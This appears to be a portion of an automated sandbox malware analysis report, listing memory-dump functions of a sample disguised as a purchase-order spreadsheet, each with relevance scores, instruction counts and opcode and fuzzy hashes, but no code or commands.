Instruction ID: 86cde1a27c18bdd9973ffbaef881ff646d1c6f6a27888a6e0815bc23a8f8c300
Opcode Fuzzy Hash: 5269a60be9007b77f07c77323c15a4458a97aaf8e3282bb18dc0d4059d90baa0
Instruction Fuzzy Hash: A451C1750267438FCB6C3FA1B5EC26B7BA1FB4F32B7456D64A02E9142ADB345489CB10

Function 0118CED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d51cde85a20fcafb4915e9753771daeb8b6d32cd95b38269efc9632239d569
Instruction ID: c46b2e017318eb7e5318acfb2b330d47d349b18b19fdd25e1338fd476cc51e82
Opcode Fuzzy Hash: b2d51cde85a20fcafb4915e9753771daeb8b6d32cd95b38269efc9632239d569
Instruction Fuzzy Hash: FE51B1750267478FCA6C3BA1B5EC26B7B64FB4F32B7446D64B02E9142A9B3450898F20

Function 0118E2EF Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6580fa3e5aee4832a7df00ca7dae4a9e7acabce3230e86dec893b1773348caf7
Instruction ID: a12bf752012404bbe544ab84b7ec8c25de83c4e03e9597dd117fe3f9dc587ef5
Opcode Fuzzy Hash: 6580fa3e5aee4832a7df00ca7dae4a9e7acabce3230e86dec893b1773348caf7
Instruction Fuzzy Hash: 4E61F274D01218CFDB18DFE9D984ADDBBB2FF89300F608529D909AB295DB356985CF40

Function 0118CD10 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ae1b1e52a28368b856e50d4aa299c85dc9db8d41066e8dd9bf419b85937e91c
Instruction ID: 7a11712b5941a2e015bbc953c80bb3dece5c14d2193468ec34a0486b8a6a4a05
Opcode Fuzzy Hash: 7ae1b1e52a28368b856e50d4aa299c85dc9db8d41066e8dd9bf419b85937e91c
Instruction Fuzzy Hash: 33518274E01218DFDB48DFA9D9849DDBBF2BF89300F20816AE405AB365DB31A905CF50

Function 0576CA98 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac64d53e540c6698424a0bd4c6a94e4defc05df205b082320053bb8998e153e5
Instruction ID: a400c38fc1c9b2c953857004b43dd29e97d6167da108067df90b519babf6f02b
Opcode Fuzzy Hash: ac64d53e540c6698424a0bd4c6a94e4defc05df205b082320053bb8998e153e5
Instruction Fuzzy Hash: B7415C3291131ADFD704AFA1D45C7EF7BB5FB4A316F104869D126B62A0CB781A48CF91

Function 01183908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3724c3ca7de284069747f2bf224c02ce6c68c98550a130e4d6c5b572c24b1e5a
Instruction ID: 4739414f715643f90781b5b1be98110e8d41c03d5a4a80988ed639fddf8942c0
Opcode Fuzzy Hash: 3724c3ca7de284069747f2bf224c02ce6c68c98550a130e4d6c5b572c24b1e5a
Instruction Fuzzy Hash: 0351B375E11208CFCB58EFA9D59099DBBB2FF89310B209469E805AB364DB31AC46CF40

Function 0118F101 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cafc22d8484b1b2a1846cdef49ab29b2d5fc6cd1c8405292bd3a4d1391b225f
Instruction ID: af38876b18676aeb792f292731b9193816c6ce598c0f7d73056627ebe9dc54fb
Opcode Fuzzy Hash: 1cafc22d8484b1b2a1846cdef49ab29b2d5fc6cd1c8405292bd3a4d1391b225f
Instruction Fuzzy Hash: 5751B374D01229CFCB68EF68D984BEDBBB2BB49301F1095A9D409A7354D7359E86CF00

Function 01189A63 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1df0583e7f833bd8f8f643891774e928a5896de6f9e88c6987f663d9f233fe4
Instruction ID: 015ad55963f1e9459ee90e42c97f0a1c9147d16fa30dee3098db0a27445ece76
Opcode Fuzzy Hash: b1df0583e7f833bd8f8f643891774e928a5896de6f9e88c6987f663d9f233fe4
Instruction Fuzzy Hash: 5D41A130A0424DDFCF19DFA8C844AADBFB2AF89318F04C555E9159B291D335D950CF61

Function 05768808 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b0f668d7fe148daa4e09d06cd83ee4a707392f84ad1f9680233c3e4e3c91e89
Instruction ID: 1acbd90a497ef67c09240903af1121905ab57e68bfad2c45cb3d861ced23c9dc
Opcode Fuzzy Hash: 6b0f668d7fe148daa4e09d06cd83ee4a707392f84ad1f9680233c3e4e3c91e89
Instruction Fuzzy Hash: 05417471E003199BDB14DFA5C884BDEBBF5BF88700F14812AE806B7350DB70A945DB92

Function 0118D7E6 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c56458e10a57cf1b0a967e5e02ce51f48866293d184c8ba141119e29aaadfdb
Instruction ID: dd35d7ce543ce66fc27320eb23ed5fb56219ccab3a98a2810e590341f63af71f
Opcode Fuzzy Hash: 8c56458e10a57cf1b0a967e5e02ce51f48866293d184c8ba141119e29aaadfdb
Instruction Fuzzy Hash: CD412474D05248CFCF1CEFE8E4946ADBBB1BB4A308F61D029D419A7284DB349882CF15

Function 0118D786 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb8d5aae7e4a8830b4e3fd69bfc0c47315868f45ab31fb0a92fc3ca3a43433f3
Instruction ID: 932cfaaa9d132d90b64b86e18ca84077a37e6fdf2d0d33231e2d8bb13aaefc39
Opcode Fuzzy Hash: eb8d5aae7e4a8830b4e3fd69bfc0c47315868f45ab31fb0a92fc3ca3a43433f3
Instruction Fuzzy Hash: E2411174D05248CFCF18EFE8E494AADBBB2BB4A308F60D129E419A7284D7349881CF55

Function 0118D638 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9a26f8fde25df64eceeba0b9d02cfc46260e83cb89981ac2558d519af2df2d1
Instruction ID: 1f64d704f93b16a289b78629fdf254571140ee7d922d1ff022c5a375940509f4
Opcode Fuzzy Hash: b9a26f8fde25df64eceeba0b9d02cfc46260e83cb89981ac2558d519af2df2d1
Instruction Fuzzy Hash: C5412770D01248CFDB18EFEAE484ADEFBB2BB89304F64D129D418A7294DB359881CF54

Function 01184DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0c371084e10493b7d28d7c012a98522af700eb42952d234128b479b840b4cf
Instruction ID: a8a48f968fbbc036be7ce1244187604348b5eb42937223c372c2b7b43fee71ac
Opcode Fuzzy Hash: bd0c371084e10493b7d28d7c012a98522af700eb42952d234128b479b840b4cf
Instruction Fuzzy Hash: 4E31613160411A9FCB1AAF68E4D4AAF7FA6FF88300F108424F9159B695CF38DD61DB91

Function 011876D0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a6bd5d130410fc6a21d88ada8d8562e0f7880efac3612c00b866d860e46337
Instruction ID: 54cfb63d8bba08c4474bf401e5122ca975c4446321eb0ccd63779fa390d3bf1f
Opcode Fuzzy Hash: f8a6bd5d130410fc6a21d88ada8d8562e0f7880efac3612c00b866d860e46337
Instruction Fuzzy Hash: 3E21D8353046114BDB1E773988D857D7A9B9FC46187288075D505CB7D9EF25CC42DB82

Function 0118A809 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb58b42d22a69b1a2b3092d6eecb8ee5ce7a15b6ef6229e0aed4dc91fc7b76a
Instruction ID: ca483111f127191d6e43369b4bf44a91487af4a28eeb96dfe1c4cd3890d7bb18
Opcode Fuzzy Hash: 0bb58b42d22a69b1a2b3092d6eecb8ee5ce7a15b6ef6229e0aed4dc91fc7b76a
Instruction Fuzzy Hash: 7531AE70E406058FCB08DF68D8849AEBBF6BF85320B15C15AE5159B3A1DB35AC42CF90

Function 011876E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661cd586b30876d4608a610b4f9e737edd9cd958073be20f8ae9c84e3b672192
Instruction ID: 8d08959b9e5bb15691451b1e6a9df360e6f12a582841785fdb9f7b75e815845a
Opcode Fuzzy Hash: 661cd586b30876d4608a610b4f9e737edd9cd958073be20f8ae9c84e3b672192
Instruction Fuzzy Hash: 4921C43530461047EB2D3629889863E759B9FC4618F288074D506CB7C9EF25CC82DB81

Function 00EBD005 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4108113448.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ebd000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4cb77ae885f933ad3699ec32404dcdab4d3748c98bc0d3beb9ff2c1e7b47ddb
Instruction ID: 935f7752cfde7c8843453998cb23c572d0fde0cbb17f6da0730e7d5debf578f8
Opcode Fuzzy Hash: d4cb77ae885f933ad3699ec32404dcdab4d3748c98bc0d3beb9ff2c1e7b47ddb
Instruction Fuzzy Hash: 21314D7550E3C08FDB03DB24C9A4751BF71AF47214F1985DBD889CF2A7D22A980ACB62

Function 01185A60 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95493f7894775663a8fde40e9cc657f0128ff2f118d4535bf287f99ead69551
Instruction ID: db9f9c55b740c4f1c608bbef552bf6b35395c25612a3e9a49a1414b2864fc1c4
Opcode Fuzzy Hash: c95493f7894775663a8fde40e9cc657f0128ff2f118d4535bf287f99ead69551
Instruction Fuzzy Hash: AB21AC34701A118FC36EAB29D4E452ABBA3EF8966071581B9E906DB395DF34DC028B81

Function 01182060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e6ee014523eb2a6ede8dadaadca128ddbe7ecbe1500526f0d0e5da40ea8bc4
Instruction ID: 293005f1cbdd7a6568a711481bb1f372b63266c5d515a684eef40bb10e132422
Opcode Fuzzy Hash: 66e6ee014523eb2a6ede8dadaadca128ddbe7ecbe1500526f0d0e5da40ea8bc4
Instruction Fuzzy Hash: CB21C735A002069FCB5AEF78C550AAE77B6EB99250F10C519D8058B358DB35EE42CBD1

Function 00EBD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4108113448.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ebd000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea5ab8345633ffab5b1ecd113c246b397f3114eb7f823cfe4c1ade8b6a49629
Instruction ID: dbdfe9b1672372656c188afc8e2395e1d526d6c9853b115321dcebf7901b07e8
Opcode Fuzzy Hash: cea5ab8345633ffab5b1ecd113c246b397f3114eb7f823cfe4c1ade8b6a49629
Instruction Fuzzy Hash: E52134B1508204EFCB14EF24CDC0B67BB66FB84318F24C96DE9495B242D73AD846CB61

Function 0118215C Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02668df71c4e9531770a086a9369a660eb95770306d803a0cbf2ebcb6f87fc93
Instruction ID: ef7b9c2b691728e2d08df2c2c93412ab006591b33f7ab3bbbbe8081e8d3f07df
Opcode Fuzzy Hash: 02668df71c4e9531770a086a9369a660eb95770306d803a0cbf2ebcb6f87fc93
Instruction Fuzzy Hash: 33119E75E0434A9FCB06ABF89C108DEBB30FF8A3207258796D522B70A1FB351946C791

Function 01184DB9 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c5fdd295ce08d3e25c3f4a8034eda8382587277fa7ac242a356622c704fc69
Instruction ID: f2586976b605e7590db9ab3715403a8df26f023439bad5be2b26933ce681f4ae
Opcode Fuzzy Hash: 34c5fdd295ce08d3e25c3f4a8034eda8382587277fa7ac242a356622c704fc69
Instruction Fuzzy Hash: 85219531608216DFC719AF68E49476A3FA1FF88310F108469F4159B696CB38DD51CBD0

Function 011839ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7bf8b9074f97cd65a92f720647e9eb62d111cac5a652992c827c5523f33a22b
Instruction ID: 23692082d6a91ff5679c29bcf43cc27335412d49ce971914048dc108c8a40d48
Opcode Fuzzy Hash: a7bf8b9074f97cd65a92f720647e9eb62d111cac5a652992c827c5523f33a22b
Instruction Fuzzy Hash: AE31C874E11308CFCB58EFA8E59499DBBB6FF49301B205469E919AB328D731AD05CF40

Function 057689FB Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8282f0bc60eab1cef945993e0440f51d24a69103c6e4480fdae04b6e6e41ed
Instruction ID: db00fc0dd88661cc91a3f26a50460d3aaa933a6397a690b0c82f7169d859b272
Opcode Fuzzy Hash: 9d8282f0bc60eab1cef945993e0440f51d24a69103c6e4480fdae04b6e6e41ed
Instruction Fuzzy Hash: 2A11273A7082941FCF476FB8586426E3FA3EFC9210B44486DE505E7382DE384E02C796

Function 0576CE98 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8c43a2a2443a1cdb93bed1d0ea2a13a0759af868dff14daa946c1319564c19
Instruction ID: b1a65d5b0e04551f997110ec4b66792a0154791e5d57c72921db13234aed33df
Opcode Fuzzy Hash: fe8c43a2a2443a1cdb93bed1d0ea2a13a0759af868dff14daa946c1319564c19
Instruction Fuzzy Hash: 7411E5317092445FC71A4AB958546BBBFEFAFCA350B148477EA45C72C6CE348C459371

Function 0118E211 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2601baad16715e649142463b6a8a39e9d757eb9a4b8fc034a29b082c4107e7a5
Instruction ID: d7879274184cfe9952a20b50a36227e513601eb49afcccebe593a37811c232be
Opcode Fuzzy Hash: 2601baad16715e649142463b6a8a39e9d757eb9a4b8fc034a29b082c4107e7a5
Instruction Fuzzy Hash: B52149B09012099FCB45EFB9C980A9EBFF1FB45304F0095AAD004AB265EB745E4ACB81

Function 01185A70 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 946f42a9e5e90caab0fb05aadee3ebfe168f76ede3a0a6c0bdd4e8d4d6a9dd43
Instruction ID: 77cc2943b1ae12691ca0c8e2defaa0c64dc896f311d06b98bf51223f3545f646
Opcode Fuzzy Hash: 946f42a9e5e90caab0fb05aadee3ebfe168f76ede3a0a6c0bdd4e8d4d6a9dd43
Instruction Fuzzy Hash: 7311A1313006129FD76EAA29D4E492EBBA7FFC86617158178E906DB354DF30DC028BD0

Function 01181F08 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 924532a6f95a6f9e93e8997d0fc5a5f2dd7636be8cd9dc0ace69126da1351b61
Instruction ID: 57c84a0e90e30b3badd28902269d591c6e70a78947aa5f7f607a299751e6db00
Opcode Fuzzy Hash: 924532a6f95a6f9e93e8997d0fc5a5f2dd7636be8cd9dc0ace69126da1351b61
Instruction Fuzzy Hash: 5F2136B4D042098FCB54EFA8C9845EEBFB5FF09300F10516AE955B7264EB305A85CF91

Function 05768CA0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47862de6ecd5a985c95c43ac39249f072adc91637c905aa1a6e85de12edfa4aa
Instruction ID: b5a0acaaca9508c8a15f232b96da112b40d99c5f719f62685807c11c9e8de8ff
Opcode Fuzzy Hash: 47862de6ecd5a985c95c43ac39249f072adc91637c905aa1a6e85de12edfa4aa
Instruction Fuzzy Hash: 902159B68002499FDB10CF99C945BDEBFF5EB48320F148459E924A7210C379A554DFA5

Function 05768658 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5067277cf7e5cab752358398cec9ef078cf4d832277fd6dcf965c91427cd1f03
Instruction ID: d2379a6533e94a2382505d2f4642c8b4a12786d5b3fdc5dabe83a2495c8a717f
Opcode Fuzzy Hash: 5067277cf7e5cab752358398cec9ef078cf4d832277fd6dcf965c91427cd1f03
Instruction Fuzzy Hash: 921144B68002499FDB10CF99C944BEEBBF5EB48320F148419EA28A7210C379A550DFA1

Function 0118E220 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8d387076818ebdee1cd6e64ae79d1683165f0c3a09c3661803021432b503cf
Instruction ID: c97a52712f070b4723ae6bc1d8a0e6d31ae63cf1c2d1fba8220cfeb2e7c2ac5f
Opcode Fuzzy Hash: da8d387076818ebdee1cd6e64ae79d1683165f0c3a09c3661803021432b503cf
Instruction Fuzzy Hash: DB114CB4E011099FDB44EFB9D984B9EBFF2FB45300F00D5AAD004AB265EB745E458B81

Function 057681C9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce5f4b9705a74cd07c6310ca08528fa2bc873069a12c7b8967ed7aabccfc758
Instruction ID: 4610c93a3937dabca6395644afd7d6150d93c87583a54e6b021707c78dc55dc6
Opcode Fuzzy Hash: 3ce5f4b9705a74cd07c6310ca08528fa2bc873069a12c7b8967ed7aabccfc758
Instruction Fuzzy Hash: 30110C78F011488FDB04DFF9D954BEEBBF2EB89315F019465E908BB349E63099828B51

Function 01185607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dec600a19541f3ee14c67089099bf63774d5f8f9b97c94f7d8f9e6f6fd3de2d
Instruction ID: cb7f9a51771cfe278d32a90401a6e2d2e02ee4274b8dc796ebf4d5dad697dc8b
Opcode Fuzzy Hash: 8dec600a19541f3ee14c67089099bf63774d5f8f9b97c94f7d8f9e6f6fd3de2d
Instruction Fuzzy Hash: 460168717001056FDB4A9E68A8406EF3FE7EFC9351B28C02AF904DB280DB31CC028BA0

Function 0118DF20 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddab3861df68a936957548db88fcc02d0a044bd764b778dee02c82756df566f2
Instruction ID: ead25d7947de2de59f19b8174f273cfd6948de31eec261c93ddddc3eb7b71700
Opcode Fuzzy Hash: ddab3861df68a936957548db88fcc02d0a044bd764b778dee02c82756df566f2
Instruction Fuzzy Hash: A2F0E531904326DFCB09AFE5EC066AAB7B4EB86311F41D825E104E3191CB719516DED7

Function 0118D460 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a3648cf22fc2ca10dc045d4c1c1dec196449f968aefc3a8c0e5add2c371a524
Instruction ID: 6ab2a149f31960454118e14f2da7fac380d19af6ac2895734c5037635e972d51
Opcode Fuzzy Hash: 4a3648cf22fc2ca10dc045d4c1c1dec196449f968aefc3a8c0e5add2c371a524
Instruction Fuzzy Hash: 4BF0E530D04319DBCB08EAAAE9096EAB3B4DB8A311F01D569D204A35A1C7736525CDD6

Function 01182010 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a2d4ad703eb5c7f20a039c4b2790c9af79923e388cd845792cc59cca8ff731
Instruction ID: 1ba677464a79d96c9c852d611357bba3b2408e99ac51578ceeb2c6d044eaedaf
